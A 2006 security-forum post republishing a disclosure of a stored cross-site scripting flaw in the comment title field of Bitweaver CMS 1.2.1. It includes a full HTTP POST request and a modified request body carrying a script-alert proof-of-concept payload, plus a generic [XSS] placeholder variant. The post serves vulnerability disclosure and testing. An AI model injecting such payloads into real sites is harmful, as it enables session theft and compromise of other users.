|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 80
Members: 0
Total: 80
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Bitweaver CMS 1.2.1 User Comment Title Cross-Site |
|
Posted: Sun Mar 05, 2006 7:53 pm |
|
|
Kiki |
Regular user |
|
|
Joined: Nov 13, 2005 |
Posts: 7 |
Location: Italy |
|
|
|
|
|
|
Code: |
Bitweaver CMS 1.2.1 User Comment Title Cross-Site Scripting Vulnerability
####################################
Information of Software:
Software: Bitweaver CMS 1.2.1
Site: http://www.bitweaver.org
Description of software: bitweaver is continually improving it's stability,
usability, flexibility and power. The rate at which this is happening is quite
astonishing and bitweaver has come a long way since it's birth, just over a year ago.
####################################
Bug:
Bitweaver contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in the title of registed user comment page and the
user can modify the function POST and insert the XSS code
- HTTP POST request -
http://[target]/[patch]/read.php?article_id=7#editcomments
POST /articles/read.php?article_id=7 HTTP/1.1
Host: http://[target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/articles/read.php?article_id=7
Cookie: mod_usertrack=82.56.164.250.1141558144377994; BWSESSION=v5a6krvki42h0puv48dc5coki0; tz_offset=3600; tiki-user-bitweaver=616706c4d6f7bdf68b30893f860cbb2b
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
tk=c67481b438f7be3da147&comments_maxComments=10&comments_
style=threaded&comments_sort_mode=commentDate_desc
&post_comment_reply_id=&post_comment_id=&comment_title=hacking
&comment_data=[your_name_logged]&post_comment_submit=Post
but we can modify the request POST in this way:
tk=c67481b438f7be3da147&comments_maxComments=10&comments
_style=threaded&comments_sort_mode=commentDate_desc
&post_comment_reply_id=&post_comment_id=&comment_title=
%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E&comment
_data=[your_name_logged]&post_comment_submit=Post
---------------------------------------------------------
Example:
For this exploit you must be registred at the site.
you can insert in the text post an XSS code or you can modify the request in this way:
tk=c67481b438f7be3da147&comments_maxComments=10&comments
_style=threaded&comments_sort_mode=commentDate_desc&
post_comment_reply_id=&post_comment_id=&comment_title=[XSS]
&comment_data=[your_name_logged]&post_comment_submit=Post
####################################
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org
http://blackzero.netsons.org
####################################
|
Original exploit: http://kiki91.altervista.org/exploit/bitweaver_1.2.1_XSS.txt
Kiki
http://kiki91.altervista.org
http://blackzero.netsons.org |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|